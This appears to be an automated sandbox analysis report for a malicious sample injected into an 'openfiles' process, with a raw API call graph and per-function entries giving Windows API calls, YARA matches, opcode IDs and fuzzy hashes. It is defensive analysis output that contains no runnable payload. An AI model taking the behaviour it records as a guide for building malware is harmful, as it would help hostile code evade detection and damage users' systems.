28340aa 95993->95994 95995 28340b7 95994->95995 96008 2821020 95994->96008 95995->95989 95998 2822b87 95997->95998 96000 2822ba0 95998->96000 96001 2838440 95998->96001 96000->95992 96003 2838458 96001->96003 96002 283847c 96002->96000 96003->96002 96004 2837090 LdrInitializeThunk 96003->96004 96005 28384d1 96004->96005 96006 28398d0 RtlFreeHeap 96005->96006 96007 28384ea 96006->96007 96007->96000 96009 282105b 96008->96009 96024 28272d0 96009->96024 96011 2821063 96012 2821326 96011->96012 96013 28399b0 RtlAllocateHeap 96011->96013 96012->95995 96014 2821079 96013->96014 96015 28399b0 RtlAllocateHeap 96014->96015 96016 282108a 96015->96016 96017 28399b0 RtlAllocateHeap 96016->96017 96019 282109b 96017->96019 96023 2821125 96019->96023 96039 28260c0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96019->96039 96020 2823e40 LdrLoadDll 96021 28212e3 96020->96021 96035 2836770 96021->96035 96023->96020 96025 28272fc 96024->96025 96026 28271c0 2 API calls 96025->96026 96027 282731f 96026->96027 96028 2827341 96027->96028 96029 2827329 96027->96029 96030 282735d 96028->96030 96033 2837a00 NtClose 96028->96033 96031 2827334 96029->96031 96032 2837a00 NtClose 96029->96032 96030->96011 96031->96011 96032->96031 96034 2827353 96033->96034 96034->96011 96036 28367ca 96035->96036 96038 28367d7 96036->96038 96040 2821340 96036->96040 96038->96012 96039->96023 96042 2821360 96040->96042 96059 28275a0 96040->96059 96050 2821845 96042->96050 96063 2830200 96042->96063 96045 2821561 96071 283aae0 96045->96071 96047 28213be 96047->96050 96066 283a9b0 96047->96066 96048 2821576 96052 28216c5 96048->96052 96054 28215a1 96048->96054 96077 28340d0 96048->96077 96050->96038 96081 281ffe0 96052->96081 96054->96050 96055 28340d0 LdrInitializeThunk 96054->96055 96056 281ffe0 LdrInitializeThunk 96054->96056 96085 2827540 96054->96085 96055->96054 96056->96054 96057 28216cf 96057->96054 96058 2827540 LdrInitializeThunk 96057->96058 96058->96057 96060 28275ad 96059->96060 96061 28275d5 96060->96061 96062 28275ce SetErrorMode 96060->96062 96061->96042 96062->96061 96064 2839840 NtAllocateVirtualMemory 96063->96064 96065 2830221 96064->96065 96065->96047 96067 283a9c0 96066->96067 96068 283a9c6 96066->96068 96067->96045 96069 28399b0 RtlAllocateHeap 96068->96069 96070 283a9ec 96069->96070 96070->96045 96072 283aa50 96071->96072 96073 283aaad 96072->96073 96074 28399b0 RtlAllocateHeap 96072->96074 96073->96048 96075 283aa8a 96074->96075 96076 28398d0 RtlFreeHeap 96075->96076 96076->96073 96078 283412a 96077->96078 96080 283414b 96078->96080 96089 28251e0 96078->96089 96080->96048 96082 281fffc 96081->96082 96093 2837c70 96082->96093 96086 2827553 96085->96086 96098 2836fa0 96086->96098 96088 282757e 96088->96054 96090 28251c0 96089->96090 96091 28251cb 96090->96091 96092 2837a90 LdrInitializeThunk 96090->96092 96091->96080 96092->96091 96094 2837c8a 96093->96094 96097 48c2c70 LdrInitializeThunk 96094->96097 96095 2820002 96095->96057 96097->96095 96099 2837010 96098->96099 96100 2836fc1 96098->96100 96103 48c2dd0 LdrInitializeThunk 96099->96103 96100->96088 96101 2837035 96101->96088 96103->96101 96104 28250f0 96105 2827540 LdrInitializeThunk 96104->96105 96106 2825120 96105->96106 96108 282516a 96106->96108 96109 282514c 96106->96109 96110 28274c0 96106->96110 96111 2827504 96110->96111 96112 2827525 96111->96112 96117 2836da0 96111->96117 96112->96106 96114 2827515 96115 2827531 96114->96115 96116 2837a00 NtClose 96114->96116 96115->96106 96116->96112 96118 2836e12 96117->96118 96119 2836dc4 96117->96119 96122 48c4650 LdrInitializeThunk 96118->96122 96119->96114 96120 2836e37 96120->96114 96122->96120 96123 28269b0 96124 2826a22 96123->96124 96125 28269c8 96123->96125 96125->96124 96127 282a5e0 96125->96127 96128 282a606 96127->96128 96129 282a825 96128->96129 96154 2837de0 96128->96154 96129->96124 96131 282a67c 96131->96129 96132 283aae0 2 API calls 96131->96132 96133 282a698 96132->96133 96133->96129 96134 282a769 96133->96134 96135 2837090 LdrInitializeThunk 96133->96135 96136 2825070 LdrInitializeThunk 96134->96136 96138 282a788 96134->96138 96137 282a6f4 96135->96137 96136->96138 96137->96134 96143 282a6fd 96137->96143 96140 282a80d 96138->96140 96161 2836c60 96138->96161 96139 282a751 96141 2827540 LdrInitializeThunk 96139->96141 96148 2827540 LdrInitializeThunk 96140->96148 96147 282a75f 96141->96147 96142 282a72f 96176 2833250 LdrInitializeThunk 96142->96176 96143->96129 96143->96139 96143->96142 96157 2825070 96143->96157 96147->96124 96150 282a81b 96148->96150 96149 282a7e4 96166 2836d00 96149->96166 96150->96124 96152 282a7fe 96171 2836e40 96152->96171 96155 2837dfd 96154->96155 96156 2837e0e CreateProcessInternalW 96155->96156 96156->96131 96158 2825083 96157->96158 96159 2837250 LdrInitializeThunk 96158->96159 96160 28250ae 96159->96160 96160->96142 96162 2836cd2 96161->96162 96163 2836c84 96161->96163 96177 48c39b0 LdrInitializeThunk 96162->96177 96163->96149 96164 2836cf7 96164->96149 96167 2836d72 96166->96167 96169 2836d24 96166->96169 96178 48c4340 LdrInitializeThunk 96167->96178 96168 2836d97 96168->96152 96169->96152 96172 2836eb2 96171->96172 96173 2836e64 96171->96173 96179 48c2fb0 LdrInitializeThunk 96172->96179 96173->96140 96174 2836ed7 96174->96140 96176->96139 96177->96164 96178->96168 96179->96174 96180 2830830 96181 283084c 96180->96181 96182 2830874 96181->96182 96183 2830888 96181->96183 96185 2837a00 NtClose 96182->96185 96184 2837a00 NtClose 96183->96184 96186 2830891 96184->96186 96187 283087d 96185->96187 96190 28399f0 RtlAllocateHeap 96186->96190 96189 283089c 96190->96189 96191 2827bf1 96193 2827be2 96191->96193 96192 2827be7 96193->96192 96195 2826630 LdrInitializeThunk LdrInitializeThunk 96193->96195 96195->96193 96196 2828ffb 96197 282900a 96196->96197 96198 2829011 96197->96198 96199 28398d0 RtlFreeHeap 96197->96199 96199->96198

                            Executed Functions

                            Function 0282B880 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0282B964
                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0282B99F
                            • FindClose.KERNELBASE(?), ref: 0282B9AA
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNext
                            • String ID:
                            • API String ID: 3541575487-0
                            • Opcode ID: 95d3f38155cf3e7d98441b1da7b51dcbd73ab4b3e20609f53f6848a999925e31
                            • Instruction ID: e4a4068a724a4159ab48882c6458f40b174283e5573f512a7714c81732787111
                            • Opcode Fuzzy Hash: 95d3f38155cf3e7d98441b1da7b51dcbd73ab4b3e20609f53f6848a999925e31
                            • Instruction Fuzzy Hash: F9318F796002186BDB20DB68CC85FEE777DAF44709F144558F948E6180EA70AA89CBA1
                            Function 02837720 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02837810
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 3f3e4ca8b32345b7715982c1e894d814639bfea704df124c5d7d303f5072b047
                            • Instruction ID: b04564bc550285cca10483fc87dde5b6697d01d8328364ad70b1a8578fd1aecb
                            • Opcode Fuzzy Hash: 3f3e4ca8b32345b7715982c1e894d814639bfea704df124c5d7d303f5072b047
                            • Instruction Fuzzy Hash: 1731A2B9A00609AFCB14DF98D881EDEB7F9EF8C714F108219F919A7240D734A8518BA5
                            Function 02837880 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02837958
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 174f0ddcbf07d2546ff7a2ebb0859a43909a4d34a43135080bf407fe4a5062ba
                            • Instruction ID: 3ed91c3a9066ff237650a0508eb97b85885511bd7de1268ff5999d07deeece7d
                            • Opcode Fuzzy Hash: 174f0ddcbf07d2546ff7a2ebb0859a43909a4d34a43135080bf407fe4a5062ba
                            • Instruction Fuzzy Hash: 8A31E8B9A00208AFCB14DF99D881EEFB7B9EF8C314F108119FD19A7240D634A851CBA5
                            Function 02837B50 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtAllocateVirtualMemory.NTDLL(028213BE,?,028367D7,00000000,00000004,00003000,?,?,?,?,?,028367D7,028213BE,028213BE,00000000,?), ref: 02837C0A
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: 9300c5f97b15a09c632acfd5eb355f9bd1572517e8ad1941bd802c480e4b648a
                            • Instruction ID: 6ee92de37a37406869db6ea5552c5b7565512d64883dbee3211f121a387d9db4
                            • Opcode Fuzzy Hash: 9300c5f97b15a09c632acfd5eb355f9bd1572517e8ad1941bd802c480e4b648a
                            • Instruction Fuzzy Hash: 93210AB9A00208AFDB14DF58DC81EEBB7BDEF88710F108109FE09A7240D674A951CBA5
                            Function 02837960 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteFile
                            • String ID:
                            • API String ID: 4033686569-0
                            • Opcode ID: 00c5ac12c6d47f6b179701d109dcc82ff3eb903fd1063705622e10769582f13a
                            • Instruction ID: 9ebb67e9090098df55eac0e44d74179ea2884fbf4024e0329d014ff226f559c8
                            • Opcode Fuzzy Hash: 00c5ac12c6d47f6b179701d109dcc82ff3eb903fd1063705622e10769582f13a
                            • Instruction Fuzzy Hash: B301C4796007047FD610EA68DC41FEB776DDF89710F404509FA099B280DB7479118BE6
                            Function 02837A00 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02837A37
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction ID: 6dc69869dfe9907ebebe46dfd77bd4f9b8086e738eb7b91b9cacf21d66b349db
                            • Opcode Fuzzy Hash: 5847906c8a1ca0dc22bc5043a5de27c633cd4e7d5b36032172342240bb284932
                            • Instruction Fuzzy Hash: 94E0863A2012147BD620FA59DC01FDBBB6DDFC5754F408415FA0DA7281C670791187F5
                            Function 048C4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b10f66d2a88a5f1ebc1a9c4cfb48b4207491e70ad243252827676cdd91c2b116
                            • Instruction ID: ddfb8b7a0a1f0e7cca071f90c6037f0192ebf91d34c92caa897ca0e76a76a616
                            • Opcode Fuzzy Hash: b10f66d2a88a5f1ebc1a9c4cfb48b4207491e70ad243252827676cdd91c2b116
                            • Instruction Fuzzy Hash: 1F9002656025104661407158480440661159BE1305395C615A1659560C8618D999926A
                            Function 048C4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ebcccf5696c1638d49688d237c08538317f6c9e876332f9d73f2d114f1819abf
                            • Instruction ID: 1ef8b96ba4ed95dbe986a14b150e48fa0907c1b4e1caaa3463988e8d56f63b1d
                            • Opcode Fuzzy Hash: ebcccf5696c1638d49688d237c08538317f6c9e876332f9d73f2d114f1819abf
                            • Instruction Fuzzy Hash: 2890023560681016B1407158488454641159BE0305B55C511E1529554C8A14DA9A5362
                            Function 048C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 938b276660738ddb9a189a64b8506fef6a648ebcdf31b8c4fa15dded292e21d9
                            • Instruction ID: d5b96f0c02d213be763939eab8500157f726693cfd2998d477cbfc9b7b93ecac
                            • Opcode Fuzzy Hash: 938b276660738ddb9a189a64b8506fef6a648ebcdf31b8c4fa15dded292e21d9
                            • Instruction Fuzzy Hash: 6390023520241406F1007598540864601158BE0305F55D511A6129555EC665D9D56132
                            Function 048C2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 83bcc76116c067f0d93bba1d46bd79eca1ce5e4569c9c73ac35b01a140e721f8
                            • Instruction ID: f3eaa8181c3fd58534cc2cd2021d4d4f48ea28786b394ba71ece179dd6a200d0
                            • Opcode Fuzzy Hash: 83bcc76116c067f0d93bba1d46bd79eca1ce5e4569c9c73ac35b01a140e721f8
                            • Instruction Fuzzy Hash: 2390023520241846F10071584404B4601158BE0305F55C516A1229654D8615D9957522
                            Function 048C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: de0b2a3baa165bd381e4d464c0491e8a83b4a62d71e6ea8b006c0be1d31ee8fa
                            • Instruction ID: 42733fc250c9602250939d78447b8f5f9a541ab29016955d8b010334ddcd0d0d
                            • Opcode Fuzzy Hash: de0b2a3baa165bd381e4d464c0491e8a83b4a62d71e6ea8b006c0be1d31ee8fa
                            • Instruction Fuzzy Hash: F890023520249806F1107158840474A01158BD0305F59C911A5529658D8695D9D57122
                            Function 048C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5147b8cf0b2334579114688ef2e0744c31052760b7dc2baf045815813175e839
                            • Instruction ID: 8361c8cb372c5faf517a5614863b70ac8f8efb7866d731f5b6105f58859832f4
                            • Opcode Fuzzy Hash: 5147b8cf0b2334579114688ef2e0744c31052760b7dc2baf045815813175e839
                            • Instruction Fuzzy Hash: 69900225243451567545B158440450741169BE0245795C512A2519950C8526E99AD622
                            Function 048C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e1ab36b9b1722ec2da1d80574566ba511967e420528651bd7ec5312d72589c96
                            • Instruction ID: f48ee5d14c6de728ff7a35817066dff2a0010aa9da58750b2f54f17704437562
                            • Opcode Fuzzy Hash: e1ab36b9b1722ec2da1d80574566ba511967e420528651bd7ec5312d72589c96
                            • Instruction Fuzzy Hash: F490023520241417F1117158450470701198BD0245F95C912A1529558D9656DA96A122
                            Function 048C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9cfd510c071ac9faf3a0a49e7cc791315e827f02265dcf9d9d962f26e3d6b411
                            • Instruction ID: 62d589d46b73cb14bb8f72de3ae07318d3f53853e34ce27b9f44d99dccb37030
                            • Opcode Fuzzy Hash: 9cfd510c071ac9faf3a0a49e7cc791315e827f02265dcf9d9d962f26e3d6b411
                            • Instruction Fuzzy Hash: 1490022D21341006F1807158540860A01158BD1206F95D915A111A558CC915D9AD5322
                            Function 048C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9aaa06dc1d7d9ec61f9e9cc12c0b25ff2d8c81afb6ad2d80220d9cb0978c21e8
                            • Instruction ID: 03856e0e8f3db9209e7491e2ea03ba34ec703fdbb931d185a13dc51f311362bf
                            • Opcode Fuzzy Hash: 9aaa06dc1d7d9ec61f9e9cc12c0b25ff2d8c81afb6ad2d80220d9cb0978c21e8
                            • Instruction Fuzzy Hash: AA90022530241007F140715854186064115DBE1305F55D511E1519554CD915D99A5223
                            Function 048C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5b2c27e7b5c50173b401a8957497d69309b3f3a8532fa3559a7c5c2b001896d4
                            • Instruction ID: 30e514ee31daf28fc63021d0f19f64b2077aa5436704e7ab61538d231a43a90e
                            • Opcode Fuzzy Hash: 5b2c27e7b5c50173b401a8957497d69309b3f3a8532fa3559a7c5c2b001896d4
                            • Instruction Fuzzy Hash: 0E90022560241506F10171584404616011A8BD0245F95C522A2129555ECA25DAD6A132
                            Function 048C2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8e8015dfc11ff5a8c2d36825b45bca64e10ab22ce2d94d17690bf8be4b6f70a4
                            • Instruction ID: 66e73bcc7e0afc205c4c211a265593dfcc42720e6bbdf6373c7218dad8ecd19d
                            • Opcode Fuzzy Hash: 8e8015dfc11ff5a8c2d36825b45bca64e10ab22ce2d94d17690bf8be4b6f70a4
                            • Instruction Fuzzy Hash: 3490026520281407F1407558480460701158BD0306F55C511A3169555E8A29DD956136
                            Function 048C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ff0cd8c99b0b31e9866efbd536f8392a046b632880f582ae94e31d1f39d1515f
                            • Instruction ID: fc938a591724ac4069308422a8f01643eafb0efc990b750c94c369e732b6f9d6
                            • Opcode Fuzzy Hash: ff0cd8c99b0b31e9866efbd536f8392a046b632880f582ae94e31d1f39d1515f
                            • Instruction Fuzzy Hash: AB900225602410466140716888449064115AFE1215755C621A1A9D550D8559D9A95666
                            Function 048C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c79c7735682f562a5ca7fb6761eeb6d2dcc72fc657ade4004cbf4681b1115e5f
                            • Instruction ID: bc70aa3c6991262369418a96f0bb450a3e478e71040a27031acf7b2d5e9eca31
                            • Opcode Fuzzy Hash: c79c7735682f562a5ca7fb6761eeb6d2dcc72fc657ade4004cbf4681b1115e5f
                            • Instruction Fuzzy Hash: E1900225212C1046F20075684C14B0701158BD0307F55C615A1259554CC915D9A55522
                            Function 048C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c9226359fe54e6219b788eb4d90a65a506401801bb34408b9adf11c69d6e0644
                            • Instruction ID: 78e74b578cd5779fc6b1aebba17cd4604dd39279906cfd487155dc474356866a
                            • Opcode Fuzzy Hash: c9226359fe54e6219b788eb4d90a65a506401801bb34408b9adf11c69d6e0644
                            • Instruction Fuzzy Hash: F990026534241446F10071584414B060115CBE1305F55C515E2169554D8619DD966127
                            Function 048C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
